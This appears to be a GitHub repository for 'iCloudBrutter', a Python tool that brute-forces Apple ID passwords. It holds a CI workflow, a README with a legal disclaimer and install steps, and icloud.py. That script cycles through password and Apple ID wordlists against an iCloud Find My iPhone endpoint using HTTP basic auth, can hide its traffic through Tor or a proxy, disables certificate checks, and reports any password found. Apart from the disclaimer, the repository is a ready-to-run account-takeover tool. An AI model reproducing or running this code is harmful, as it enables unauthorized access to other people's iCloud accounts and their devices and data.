├── .github └── workflows │ └── pythonapp.yml ├── README.md ├── icloud.PNG └── icloud.py /.github/workflows/pythonapp.yml: -------------------------------------------------------------------------------- 1 | name: Python application 2 | 3 | on: [push] 4 | 5 | jobs: 6 | build: 7 | 8 | runs-on: ubuntu-latest 9 | 10 | steps: 11 | - uses: actions/checkout@v1 12 | - name: Set up Python 3.7 13 | uses: actions/setup-python@v1 14 | with: 15 | python-version: 3.7 16 | - name: Install dependencies 17 | run: | 18 | python -m pip install --upgrade pip 19 | pip install -r requirements.txt 20 | - name: Lint with flake8 21 | run: | 22 | pip install flake8 23 | # stop the build if there are Python syntax errors or undefined names 24 | flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics 25 | # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide 26 | flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics 27 | - name: Test with pytest 28 | run: | 29 | pip install pytest 30 | pytest 31 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## AppleID Bruteforce 2 | 3 | __Usage of iCloudBrutter for attacking targets without prior mutual consent is illegal. iCloudBrutter developer not responsible to any damage caused by iCloudBrutter.__ 4 | 5 | ![screen](https://raw.githubusercontent.com/foozzi/iCloudBrutter/master/icloud.PNG) 6 | 7 | ### Installation 8 | ``` 9 | $ git clone https://github.com/foozzi/iCloudBrutter.git 10 | $ cd iCloudBrutter 11 | $ python3 icloud.py 12 | ``` 13 | -------------------------------------------------------------------------------- /icloud.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/foozzi/iCloudBrutter/b67a5a6aaafbf1df76da74a64688f0c2bf39248d/icloud.PNG -------------------------------------------------------------------------------- /icloud.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | # Coded by Momo Outaadi (M4ll0k) 4 | 5 | import sys 6 | import getopt 7 | import urllib3 8 | import plistlib 9 | import requests 10 | from requests import Session 11 | from requests.auth import HTTPBasicAuth 12 | 13 | class iCloudBrute(object): 14 | def __init__(self,kwargs): 15 | self.kwargs = kwargs 16 | 17 | def readfile(self,path): 18 | return [line.strip() for line in open(path,'rb')] 19 | @property 20 | def tor(self): 21 | return 'socks5://127.0.0.1:9050' 22 | 23 | def banner(self): 24 | print(r" _ ,.. ") 25 | print(r" ,--._\\_.--, (-00) iCloud Brutter v0.1.0") 26 | print(r"; # _:( -) by Momo Outaadi (M4ll0k)") 27 | print(r": (_____/ https://github.com/m4ll0k") 28 | print(r": : ") 29 | print(r" '.___..___.` ") 30 | print(" ") 31 | 32 | def usage(self): 33 | print("Usage: %s [options]\n"%(sys.argv[0])) 34 | print("\t--id\t\tApple ID") 35 | print("\t--idw\t\tApple ID Wordlist") 36 | print("\t--wordlist\tWordlist") 37 | print("\t--proxy\t\tSet proxy") 38 | print("\t--tor\t\tUse tor\n") 39 | print("Example:") 40 | print("\t%s --id test@apple.com --wordlist pass.txt"%(sys.argv[0])) 41 | print("\t%s --id test@apple.com --wordlist pass.txt --tor"%(sys.argv[0])) 42 | print("\t%s --id test@apple.com --wordlist pass.txt --proxy 11.11.11.11\n"%(sys.argv[0])) 43 | exit() 44 | 45 | def main(self): 46 | self.banner() 47 | tor = False;apple_id=None 48 | proxy = None;idw=None 49 | if len(sys.argv) < 4: 50 | self.usage() 51 | try: 52 | opts,args = getopt.getopt(self.kwargs,"",["id=","idw=","wordlist=","proxy=","tor"]) 53 | except getopt.GetoptError as e: 54 | self.usage() 55 | for opt,arg in opts: 56 | if opt in ("--id"): apple_id = arg 57 | if opt in ("--idw"): idw = arg 58 | if opt in ("--wordlist"): wordlist = arg 59 | if opt in ("--proxy"): proxy = arg 60 | if opt in ("--tor"): tor = True 61 | print('[ i ] Starting bruteforce...') 62 | if apple_id and wordlist: 63 | for p in self.readfile(wordlist): 64 | p = p.decode('utf-8') 65 | print("[ * ] Trying with password: %s"%p) 66 | r = self.check(apple_id,p,proxy,tor) 67 | if r is True: 68 | print('[ + ] Password found: %s'%p) 69 | break 70 | elif r is None: 71 | print('[ ! ] Blocked!!!') 72 | if idw and wordlist: 73 | for i in self.readfile(idw): 74 | for p in self.readfile(wordlist): 75 | p = p.decode('utf-8') 76 | i = i.decode('utf-8') 77 | print("[ * ] Trying Password: %s - ID: %s"%(p,i)) 78 | r = self.check(i,p,proxy,tor) 79 | if r is True: 80 | print('[ + ] Found Password: %s for ID: %s'%(p,i)) 81 | break 82 | elif r is None: 83 | print('[ ! ] Blocked!!!') 84 | else: self.usage() 85 | 86 | def check(self,apple_id,passwd,proxy,tor): 87 | proxies = {} 88 | if tor is True: proxies = {'http':self.tor,'https':self.tor} 89 | if proxy != ('' or None): proxies = {'http':proxy,'https':proxy} 90 | url = ('https://fmipmobile.icloud.com/fmipservice/device/%s/initClient'%apple_id) 91 | headers = { 92 | 'User-Agent':'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_2 like Mac OS X)' 93 | } 94 | data = {"clientContext": {"appName":"FindMyiPhone","osVersion":"7.0.4","clientTimestamp": 429746389281, 95 | "appVersion":"3.0","deviceUDID":"0123456789485ef5b1e6c4f356453be033d15622","inactiveTime":1, 96 | "buildVersion":"376","productType":"iPhone6,1"},"serverContext":{}} 97 | data = plistlib.writePlistToBytes(data).decode('utf-8') 98 | session = Session() 99 | req = requests.packages.urllib3.disable_warnings( 100 | urllib3.exceptions.InsecureRequestWarning 101 | ) 102 | req = session.request( 103 | method = "POST", 104 | url = url, 105 | data = data, 106 | headers = headers, 107 | proxies = proxies, 108 | auth = HTTPBasicAuth(apple_id,passwd), 109 | verify = False 110 | ) 111 | if req.status_code == 330: return True 112 | elif req.status_code == 401: return False 113 | else: return 114 | if __name__ == "__main__": 115 | try: 116 | iCloudBrute(sys.argv[1:]).main() 117 | except KeyboardInterrupt: 118 | exit(print("Exiting...")) --------------------------------------------------------------------------------